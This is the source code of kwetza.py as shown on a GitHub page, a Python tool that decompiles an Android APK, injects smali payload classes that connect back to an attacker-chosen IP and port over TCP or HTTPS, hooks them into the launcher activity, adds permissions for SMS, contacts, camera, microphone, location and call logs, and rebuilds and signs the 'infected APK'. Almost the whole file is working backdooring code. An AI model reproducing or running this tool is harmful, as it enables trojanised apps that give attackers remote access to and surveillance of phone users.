-
Notifications
You must be signed in to change notification settings - Fork 237
/
kwetza.py
335 lines (301 loc) · 12.3 KB
/
kwetza.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
#!/usr/bin/pyton
import subprocess
import sys
import os
from bs4 import BeautifulSoup as Soup
activityToTarget=""
targetFolder=""
endpointIP=""
endpointPort=""
hexEndpoint=""
facepalm=""
cwd=""
httpsComms=0
def byteTheTCPComms():
print "[*] BYTING TCP COMMS"
totalEndpointPlain="ZZZZtcp://"+endpointIP+":"+endpointPort
endpointLength=len(totalEndpointPlain)
global facepalm
global httpsComms
httpsComms=0
facepalm=hex(endpointLength)
global hexEndpoint
for val in totalEndpointPlain:
hexEndpoint+=hex(ord(val))+"\n\t\t"
def byteTheHTTPSComms():
print "[*] BYTING HTTPS COMMS"
global httpsComms
httpsComms=1
totalEndpointPlain="ZZZZhttps://"+endpointIP+":"+endpointPort+"/qFTHTkSl1FhadlllA0gBcg882wlHLDmhMn6j1_ykMcArMkXkE-KOQ3RV-W7JtI5nf7x65a3fwcwgLEPvnCgmeb2f0m-VVEm_qAMZzFhGdNn8F46OtF_FJAP1b1AjG5x8X-GGH-rekgabzOzEMkQkgqYuUl"
endpointLength=len(totalEndpointPlain)
global facepalm
facepalm=hex(endpointLength)
global hexEndpoint
for val in totalEndpointPlain:
hexEndpoint+=hex(ord(val))+"\n\t\t"
def initialize():
print "[*] DECOMPILING TARGET APK"
command = ["apktool", "--version"]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
theResult = p.communicate()[0]
global endpointPort
global endpointIP
endpointIP=sys.argv[3]
endpointPort=sys.argv[4]
global cwd
print "[+] ENDPOINT IP: "+endpointIP
print "[+] ENDPOINT PORT: "+endpointPort
#CHECK IF APKTOOL IS INSTALLED
if "2." not in theResult:
print "[+] NO APKTOOL VERSION 2, PLEASE INSTALL APKTOOL 2 AND ADD TO PATH"
sys.exit()
cwd = os.getcwd()
#NOW WE NEED TO DECOMPILE THE APPLICATION
command = ["apktool", "d","-f","-r", ""+cwd+"/"+sys.argv[1]]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()[0]
if "error" in result:
print "[+] APKTOOL DECOMPILE ERROR: ",result
else:
print "[+] APKTOOL DECOMPILED SUCCESS"
#NOW WE SET THE TARGET FOLDER
outputFolderName=sys.argv[1]
intPoss=outputFolderName.index(".")
global targetFolder
targetFolder=cwd+"/"+outputFolderName[:intPoss]
def parseAndroidManifest():
print "[*] ANALYZING ANDROID MANIFEST"
if len(sys.argv) <= 6:
global targetFolder
file = targetFolder+"/AndroidManifest.xml"
print "[DEBUG] Attempting to find MAIN"
handler = open(file).read()
soup = Soup(handler,"lxml")
activities = soup.find_all('activity-alias')
activities+=soup.find_all('activity')
foundLAUNCHER=0
for activity in activities:
if "LAUNCHER" in str(activity):
foundLAUNCHER=1
global activityToTarget
if "android:targetactivity" in str(activity).lower():
activityToTarget= str(activity['android:targetactivity'])
elif "android:name" in str(activity).lower():
activityToTarget= str(activity['android:name'])
else:
print "[+] ERROR IDENTIFYING TARGET ACTIVITY"
if foundLAUNCHER==1:
print "[+] TARGET ACTIVIY: "+activityToTarget
else:
print "[+] NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS"
sys.exit()
else:
print "[*] USING CUSTOM ACTIVITY: "+sys.argv[6]
activityToTarget=sys.argv[6]
def readPayloads():
print "[*] PREPARING PAYLOADS"
global cwd
if httpsComms==1:
pathToPalyoad1=cwd+"/"+"payload/HttpsActivity1.smali"
pathToPalyoad2=cwd+"/"+"payload/HttpsActivity.smali"
pathToPalyoad3=cwd+"/"+"payload/PayloadTrustManager.smali"
contentsOfFile1 = open(pathToPalyoad1).read()
contentsOfFile2 = open(pathToPalyoad2).read()
contentsOfFile3 = open(pathToPalyoad3).read()
inject="L"+activityToTarget.replace('.','/')
intPackagePos=inject.rfind('/')
moo=inject[:intPackagePos]
packageNewName =moo.replace('/','.').replace('L','')
finalPackageNewName=packageNewName+".PayloadTrustManager"
preppedContents1= contentsOfFile1.replace('PLACEHOLDER',inject[:intPackagePos])
preppedContents2= contentsOfFile2.replace('PLACEHOLDER',inject[:intPackagePos]).replace('OILYOLO',finalPackageNewName)
preppedContents3= contentsOfFile3.replace('PLACEHOLDER',inject[:intPackagePos])
#inject the tcp endpoint here
preppedContents2=preppedContents2.replace('IP_ADDR',endpointIP)
preppedContents2= preppedContents2.replace('END_PORT',endpointPort)
targetDirectory=targetFolder+"/smali/"+activityToTarget.replace('.','/')
targetDirectory=targetDirectory[:targetDirectory.rfind('/')]
assist1File = open(targetDirectory+"/HttpsActivity1.smali", "w")
assist1File.write(preppedContents1)
assist1File.close()
assist2File = open(targetDirectory+"/HttpsActivity.smali", "w")
assist2File.write(preppedContents2)
assist2File.close()
assist3File = open(targetDirectory+"/PayloadTrustManager.smali", "w")
assist3File.write(preppedContents3)
assist3File.close()
pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
stringContentsOfTargetActivity=""
stringContentsOfTargetActivity = open(pathToFile).read()
else:
pathToPalyoad1=cwd+"/"+"payload/AssistActivity1.smali"
pathToPalyoad12=cwd+"/"+"payload/AssistActivity.smali"
contentsOfFile1 = open(pathToPalyoad1).read()
contentsOfFile2 = open(pathToPalyoad12).read()
inject="L"+activityToTarget.replace('.','/')
intPackagePos=inject.rfind('/')
preppedContents1= contentsOfFile1.replace('PLACEHOLDER',inject[:intPackagePos])
preppedContents2= contentsOfFile2.replace('PLACEHOLDER',inject[:intPackagePos])
#inject the tcp endpoint here
preppedContents2= preppedContents2.replace('FACEPALM',facepalm)
preppedContents2= preppedContents2.replace('BEARDEDGREATNESS',hexEndpoint)
targetDirectory=targetFolder+"/smali/"+activityToTarget.replace('.','/')
targetDirectory=targetDirectory[:targetDirectory.rfind('/')]
assist1File = open(targetDirectory+"/AssistActivity1.smali", "w")
assist1File.write(preppedContents1)
assist1File.close()
assist2File = open(targetDirectory+"/AssistActivity.smali", "w")
assist2File.write(preppedContents2)
assist2File.close()
pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
stringContentsOfTargetActivity=""
stringContentsOfTargetActivity = open(pathToFile).read()
def injectIntoActivity():
print "[*] INJECTING INTO APK"
global targetFolder
checkStrings=['create','method']
stringInvokePayload=""
pathToFile=targetFolder+"/smali/"+activityToTarget.replace('.','/')+'.smali'
if httpsComms==1:
stringInvokePayload='\ninvoke-static {p0}, INJECT/HttpsActivity;->start(Landroid/content/Context;)V\n'
else:
stringInvokePayload='\ninvoke-static {p0}, INJECT/AssistActivity;->doThis(Landroid/content/Context;)V\n'
#NOW WE NEED TO INJECT THE CALLING CODE INTO THE TARGET ACTIVITY
inject="L"+activityToTarget.replace('.','/')
intPackagePos=inject.rfind('/')
stringPackageToInject=inject[:intPackagePos]
stringInvokePayload=stringInvokePayload.replace('INJECT',stringPackageToInject);
f = open(pathToFile,'r')
stringDataToWriteIntoNewActivity=""
for line in f.readlines():
stringDataToWriteIntoNewActivity+=line
if all(x in line.lower() for x in checkStrings):
stringDataToWriteIntoNewActivity+=stringInvokePayload
f.close()
newInjectFile = open(pathToFile, "w")
newInjectFile.write(stringDataToWriteIntoNewActivity)
newInjectFile.close()
def buildAgain():
print "[+] TIME TO BUILD INFECTED APK..."
#name of the APK we are targeting
stringNameOfAPK=sys.argv[1]
#the path to our freshly built apk
pathToNewApk=targetFolder+"/dist/"+stringNameOfAPK
#the apktool command to rebuild our target app
stringApkToolBuildCommand= ["apktool","b",targetFolder]
#jarsigner command to sign our freshly built apk
stringJarSignerCommand=["jarsigner", "-keystore", cwd+"/"+"payload/mykey.keystore", pathToNewApk, "alias_name", "-sigalg", "MD5withRSA", "-digestalg", "SHA1"]
#time to execute the build command
print "[*] EXECUTING APKTOOL BUILD COMMAND..."
p = subprocess.Popen(stringApkToolBuildCommand, stdout=subprocess.PIPE)
buildResult = p.communicate()[0]
print "[+] BUILD RESULT"
print "#####################################"
print buildResult
print "#####################################"
#time to execute the jarsigner command
print "[*] EXECUTING JARSIGNER COMMAND..."
p = subprocess.Popen(stringJarSignerCommand, stdout=subprocess.PIPE)
jarsignerResult = p.communicate()[0]
print "[+] JARSIGNER RESULT"
print "#####################################"
print jarsignerResult
print "#####################################"
print "\n[+] L00t located at "+targetFolder+"/dist/"+sys.argv[1]
def injectCrazyPermissions():
print "[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED"
if "yes" in sys.argv[5]:
print "[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!"
stringCrazyPermissions='\n<uses-permission android:name="android.permission.INTERNET" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_PHONE_STATE" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.SEND_SMS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECEIVE_SMS"/>'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECORD_AUDIO" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.CALL_PHONE" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_CONTACTS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.WRITE_CONTACTS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.RECORD_AUDIO" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.WRITE_SETTINGS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.CAMERA" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_SMS" />'
stringCrazyPermissions+='\n<uses-permission android:name="android.permission.READ_CALL_LOG" />"\n'
global targetFolder
checkString="<uses-permission android:name="
pathToFile=targetFolder+"/AndroidManifest.xml"
#NOW WE NEED TO INJECT THE ADDITIONAL PERMISSIONS INTO THE TARGET MANIFEST
firstCheck=0;
f = open(pathToFile,'r')
stringDataToWriteIntoNewActivity=""
for line in f.readlines():
stringDataToWriteIntoNewActivity+=line
if checkString.lower() in line.lower():
if firstCheck==0:
stringDataToWriteIntoNewActivity+=stringCrazyPermissions
firstCheck=1
f.close()
newInjectFile = open(pathToFile, "w")
newInjectFile.write(stringDataToWriteIntoNewActivity)
newInjectFile.close()
else:
print "[*] ABUSING LEGITIMATE PERMISSIONS"
if __name__ == "__main__":
print " _ _ ___ ___ "
print " | | | | |__ \ / _ \ "
print " _ __ ___ _ __ ___ _ __ ___ _ __ ___ | | ____ _____| |_ ______ _ ) || | | |"
print "| '_ ` _ \| '_ ` _ \| '_ ` _ \| '_ ` _ \ | |/ /\ \ /\ / / _ \ __|_ / _` | / / | | | |"
print "| | | | | | | | | | | | | | | | | | | | | | < \ V V / __/ |_ / / (_| | / /_ | |_| |"
print "|_| |_| |_|_| |_| |_|_| |_| |_|_| |_| |_| |_|\_\ \_/\_/ \___|\__/___\__,_| |____(_)___/ "
print ""
try:
initialize()
except Exception as e:
print "!!!! ERROR IN 'initialize' method"
print str(e)
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
sys.exit()
try:
if "https" in sys.argv[2]:
byteTheHTTPSComms()
else:
byteTheTCPComms()
except Exception as e:
print "!!! ERROR IN 'byteTheComms' method"
print str(e)
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
sys.exit()
try:
parseAndroidManifest()
except Exception as e:
print "!!! ERROR IN 'parseAndroidManifest' method"
print str(e)
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
sys.exit()
try:
readPayloads()
except Exception as e:
print "!!! ERROR IN 'readPayloads' method"
print str(e)
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
sys.exit()
try:
injectIntoActivity()
except Exception as e:
print "!!! ERROR IN 'injectIntoActivity' method"
print str(e)
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
sys.exit()
try:
injectCrazyPermissions()
except Exception as e:
print "!!! ERROR IN 'injectCrazyPermissions' method"
print str(e)
sys.exit()
try:
buildAgain()
except Exception as e:
print "!!! ERROR IN 'buildAgain' method"
print str(e)
sys.exit()